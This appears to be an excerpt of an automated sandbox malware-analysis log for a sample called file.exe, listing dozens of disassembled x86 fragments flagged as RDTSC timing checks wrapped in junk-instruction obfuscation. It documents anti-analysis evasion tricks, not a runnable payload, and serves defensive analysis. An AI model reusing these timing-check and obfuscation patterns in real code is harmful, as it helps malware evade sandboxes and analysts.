Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1150F second address: C11514 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C11514 second address: C11545 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jmp 00007FC41CDAB671h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC41CDAB675h 0x00000013 push edx 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13F20 second address: A9D9EC instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 xor dword ptr [esp], 7964451Eh 0x0000000d jne 00007FC41CC2F0CCh 0x00000013 push dword ptr [ebp+122D1189h] 0x00000019 jmp 00007FC41CC2F0CBh 0x0000001e call dword ptr [ebp+122D3071h] 0x00000024 pushad 0x00000025 jmp 00007FC41CC2F0D0h 0x0000002a xor eax, eax 0x0000002c jmp 00007FC41CC2F0CEh 0x00000031 mov edx, dword ptr [esp+28h] 0x00000035 pushad 0x00000036 jnl 00007FC41CC2F0DBh 0x0000003c call 00007FC41CC2F0CAh 0x00000041 mov edx, dword ptr [ebp+122D3712h] 0x00000047 pop eax 0x00000048 popad 0x00000049 mov dword ptr [ebp+122D36B2h], eax 0x0000004f jmp 00007FC41CC2F0CBh 0x00000054 mov esi, 0000003Ch 0x00000059 cld 0x0000005a add esi, dword ptr [esp+24h] 0x0000005e jmp 00007FC41CC2F0D0h 0x00000063 lodsw 0x00000065 mov dword ptr [ebp+122D18D1h], edi 0x0000006b add eax, dword ptr [esp+24h] 0x0000006f jbe 00007FC41CC2F0D8h 0x00000075 jmp 00007FC41CC2F0D2h 0x0000007a clc 0x0000007b mov ebx, dword ptr [esp+24h] 0x0000007f pushad 0x00000080 sub ebx, 48E15375h 0x00000086 popad 0x00000087 nop 0x00000088 jo 00007FC41CC2F0E1h 0x0000008e push eax 0x0000008f push edx 0x00000090 push eax 0x00000091 push edx 0x00000092 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C13F91 second address: C1403F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB66Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FC41CDAB668h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 mov dx, 86A3h 0x00000028 push ecx 0x00000029 mov edx, dword ptr [ebp+122D3672h] 0x0000002f pop edx 0x00000030 push 00000000h 0x00000032 mov edi, 3742FAFAh 0x00000037 push 92B4125Fh 0x0000003c jp 00007FC41CDAB66Eh 0x00000042 add dword ptr [esp], 6D4BEE21h 0x00000049 clc 0x0000004a push 00000003h 0x0000004c mov dword ptr [ebp+122D182Ah], esi 0x00000052 push 00000000h 0x00000054 push 00000000h 0x00000056 push esi 0x00000057 call 00007FC41CDAB668h 0x0000005c pop esi 0x0000005d mov dword ptr [esp+04h], esi 0x00000061 add dword ptr [esp+04h], 00000019h 0x00000069 inc esi 0x0000006a push esi 0x0000006b ret 0x0000006c pop esi 0x0000006d ret 0x0000006e push 00000003h 0x00000070 jne 00007FC41CDAB66Ah 0x00000076 push 40EB9056h 0x0000007b pushad 0x0000007c je 00007FC41CDAB66Ch 0x00000082 js 00007FC41CDAB666h 0x00000088 jng 00007FC41CDAB66Ch 0x0000008e push eax 0x0000008f push edx 0x00000090 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1411D second address: C14122 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14122 second address: C14128 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14128 second address: C1412C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1412C second address: C14169 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push ebx 0x0000000a push esi 0x0000000b push edx 0x0000000c pop edx 0x0000000d pop esi 0x0000000e pop ebx 0x0000000f nop 0x00000010 mov dword ptr [ebp+122D30A2h], esi 0x00000016 push 00000000h 0x00000018 or dword ptr [ebp+122D1806h], edx 0x0000001e push EB11832Bh 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 jmp 00007FC41CDAB674h 0x0000002b push eax 0x0000002c pop eax 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14169 second address: C1416E instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1416E second address: C1420C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 add dword ptr [esp], 14EE7D55h 0x0000000e push 00000000h 0x00000010 push esi 0x00000011 call 00007FC41CDAB668h 0x00000016 pop esi 0x00000017 mov dword ptr [esp+04h], esi 0x0000001b add dword ptr [esp+04h], 00000017h 0x00000023 inc esi 0x00000024 push esi 0x00000025 ret 0x00000026 pop esi 0x00000027 ret 0x00000028 mov dx, 8124h 0x0000002c mov di, cx 0x0000002f push 00000003h 0x00000031 call 00007FC41CDAB66Bh 0x00000036 jmp 00007FC41CDAB679h 0x0000003b pop edx 0x0000003c push 00000000h 0x0000003e mov ecx, dword ptr [ebp+122D38B2h] 0x00000044 push 00000003h 0x00000046 sub esi, 364B837Bh 0x0000004c mov esi, dword ptr [ebp+122D38DEh] 0x00000052 call 00007FC41CDAB669h 0x00000057 push eax 0x00000058 push edx 0x00000059 pushad 0x0000005a jmp 00007FC41CDAB66Ch 0x0000005f jmp 00007FC41CDAB674h 0x00000064 popad 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C1420C second address: C14243 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC41CC2F0CCh 0x00000008 jnl 00007FC41CC2F0C6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 jmp 00007FC41CC2F0CCh 0x00000016 mov eax, dword ptr [esp+04h] 0x0000001a jnp 00007FC41CC2F0CEh 0x00000020 mov eax, dword ptr [eax] 0x00000022 push esi 0x00000023 pushad 0x00000024 push edi 0x00000025 pop edi 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C142FD second address: C14368 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b push eax 0x0000000c pushad 0x0000000d jnl 00007FC41CDAB66Ch 0x00000013 pushad 0x00000014 jmp 00007FC41CDAB673h 0x00000019 jmp 00007FC41CDAB66Ah 0x0000001e popad 0x0000001f popad 0x00000020 nop 0x00000021 sub dword ptr [ebp+122D31CEh], edi 0x00000027 movsx edx, dx 0x0000002a push 00000000h 0x0000002c mov dh, cl 0x0000002e sub dword ptr [ebp+122D31CEh], ebx 0x00000034 push A43714A7h 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007FC41CDAB677h 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14368 second address: C143D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FC41CC2F0C6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e add dword ptr [esp], 5BC8EBD9h 0x00000015 jmp 00007FC41CC2F0CBh 0x0000001a mov dx, D77Bh 0x0000001e push 00000003h 0x00000020 mov ecx, 22D54512h 0x00000025 push 00000000h 0x00000027 jmp 00007FC41CC2F0D7h 0x0000002c mov cx, 34ADh 0x00000030 push 00000003h 0x00000032 call 00007FC41CC2F0D6h 0x00000037 mov edx, 5882B46Ah 0x0000003c pop ecx 0x0000003d push FF4C4FC9h 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C143D9 second address: C143DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C143DF second address: C14452 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0CFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor dword ptr [esp], 3F4C4FC9h 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FC41CC2F0C8h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a lea ebx, dword ptr [ebp+12449E6Bh] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007FC41CC2F0C8h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000014h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a xchg eax, ebx 0x0000004b jmp 00007FC41CC2F0CBh 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 push esi 0x00000054 pushad 0x00000055 popad 0x00000056 pop esi 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C14452 second address: C1446E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC41CDAB678h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: BFA6D0 second address: BFA6D5 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C324CB second address: C324EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB675h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3280A second address: C32840 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D6h 0x00000007 jmp 00007FC41CC2F0D7h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C32840 second address: C32859 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC41CDAB675h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C32859 second address: C32882 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC41CC2F0CAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C32882 second address: C32886 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C32886 second address: C32892 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C32892 second address: C328A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnc 00007FC41CDAB66Ch 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C32A29 second address: C32A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C32A2D second address: C32A33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C32A33 second address: C32A41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007FC41CC2F0CCh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C32A41 second address: C32A48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C32A48 second address: C32A4E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C32F74 second address: C32F7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C32F7C second address: C32F87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FC41CC2F0C6h 0x0000000a pop esi 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C33222 second address: C33228 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C28147 second address: C2815B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 jmp 00007FC41CC2F0CDh 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C2815B second address: C28161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C28161 second address: C28165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C02B65 second address: C02B6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C02B6D second address: C02B7B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007FC41CC2F0C6h 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C02B7B second address: C02B80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3337E second address: C33383 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C33383 second address: C33389 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C33389 second address: C3338F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3338F second address: C333A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FC41CDAB66Eh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C333A9 second address: C333AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C33AC9 second address: C33AE1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007FC41CDAB666h 0x0000000a jmp 00007FC41CDAB66Eh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C33AE1 second address: C33AEB instructions: 0x00000000 rdtsc 0x00000002 js 00007FC41CC2F0C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C33C24 second address: C33C34 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007FC41CDAB668h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C38396 second address: C3839D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3839D second address: C383C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007FC41CDAB666h 0x0000000f jmp 00007FC41CDAB677h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C0B3DF second address: C0B3E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3BB6F second address: C3BB73 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3BB73 second address: C3BBA9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d jmp 00007FC41CC2F0D2h 0x00000012 mov eax, dword ptr [eax] 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007FC41CC2F0C8h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3BBA9 second address: C3BBDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CDAB66Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 jmp 00007FC41CDAB678h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3BD18 second address: C3BD3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a pushad 0x0000000b jmp 00007FC41CC2F0D6h 0x00000010 pushad 0x00000011 push eax 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C3F817 second address: C3F81D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C408F2 second address: C408FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC41CC2F0C6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40982 second address: C40988 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40988 second address: C409BB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jnl 00007FC41CC2F0C6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 pushad 0x00000013 jne 00007FC41CC2F0CCh 0x00000019 jnc 00007FC41CC2F0CCh 0x0000001f popad 0x00000020 mov eax, dword ptr [eax] 0x00000022 push eax 0x00000023 push edx 0x00000024 push edi 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C409BB second address: C409C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C409C0 second address: C409E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC41CC2F0D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d jns 00007FC41CC2F0D4h 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C409E7 second address: C40A1F instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC41CDAB666h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push edi 0x0000000e call 00007FC41CDAB668h 0x00000013 pop edi 0x00000014 mov dword ptr [esp+04h], edi 0x00000018 add dword ptr [esp+04h], 00000015h 0x00000020 inc edi 0x00000021 push edi 0x00000022 ret 0x00000023 pop edi 0x00000024 ret 0x00000025 cld 0x00000026 push 9CDFC551h 0x0000002b push eax 0x0000002c push edx 0x0000002d jp 00007FC41CDAB668h 0x00000033 pushad 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40B47 second address: C40B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 pushad 0x00000008 jmp 00007FC41CC2F0D9h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40DFE second address: C40E03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C40FCA second address: C40FD0 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C41545 second address: C41578 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push esi 0x00000006 pop esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebx 0x0000000b movsx esi, ax 0x0000000e nop 0x0000000f jmp 00007FC41CDAB66Ch 0x00000014 push eax 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC41CDAB675h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C41F99 second address: C4202B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FC41CC2F0CCh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push 00000000h 0x0000000f push esi 0x00000010 call 00007FC41CC2F0C8h 0x00000015 pop esi 0x00000016 mov dword ptr [esp+04h], esi 0x0000001a add dword ptr [esp+04h], 00000017h 0x00000022 inc esi 0x00000023 push esi 0x00000024 ret 0x00000025 pop esi 0x00000026 ret 0x00000027 mov dword ptr [ebp+1245217Ah], edx 0x0000002d xor esi, dword ptr [ebp+122D31C4h] 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push 00000000h 0x00000039 push esi 0x0000003a call 00007FC41CC2F0C8h 0x0000003f pop esi 0x00000040 mov dword ptr [esp+04h], esi 0x00000044 add dword ptr [esp+04h], 00000015h 0x0000004c inc esi 0x0000004d push esi 0x0000004e ret 0x0000004f pop esi 0x00000050 ret 0x00000051 jns 00007FC41CC2F0CCh 0x00000057 xchg eax, ebx 0x00000058 je 00007FC41CC2F0E0h 0x0000005e pushad 0x0000005f jmp 00007FC41CC2F0D2h 0x00000064 jl 00007FC41CC2F0C6h 0x0000006a popad 0x0000006b push eax 0x0000006c push esi 0x0000006d push eax 0x0000006e push edx 0x0000006f push ebx 0x00000070 pop ebx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4202B second address: C4202F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C428B1 second address: C428B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C4276C second address: C42770 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C428B5 second address: C428B9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C428B9 second address: C428BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C428BF second address: C428C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C428C6 second address: C42925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 sub edi, 7DDAE682h 0x0000000e push 00000000h 0x00000010 push 00000000h 0x00000012 push ebp 0x00000013 call 00007FC41CDAB668h 0x00000018 pop ebp 0x00000019 mov dword ptr [esp+04h], ebp 0x0000001d add dword ptr [esp+04h], 00000015h 0x00000025 inc ebp 0x00000026 push ebp 0x00000027 ret 0x00000028 pop ebp 0x00000029 ret 0x0000002a or si, 392Bh 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push ebp 0x00000034 call 00007FC41CDAB668h 0x00000039 pop ebp 0x0000003a mov dword ptr [esp+04h], ebp 0x0000003e add dword ptr [esp+04h], 00000014h 0x00000046 inc ebp 0x00000047 push ebp 0x00000048 ret 0x00000049 pop ebp 0x0000004a ret 0x0000004b mov dword ptr [ebp+122D3192h], edi 0x00000051 push eax 0x00000052 push eax 0x00000053 push edx 0x00000054 pushad 0x00000055 push esi 0x00000056 pop esi 0x00000057 push edx 0x00000058 pop edx 0x00000059 popad 0x0000005a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: C42925 second address: C4292F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FC41CC2F0C6h 0x0000000a rdtsc
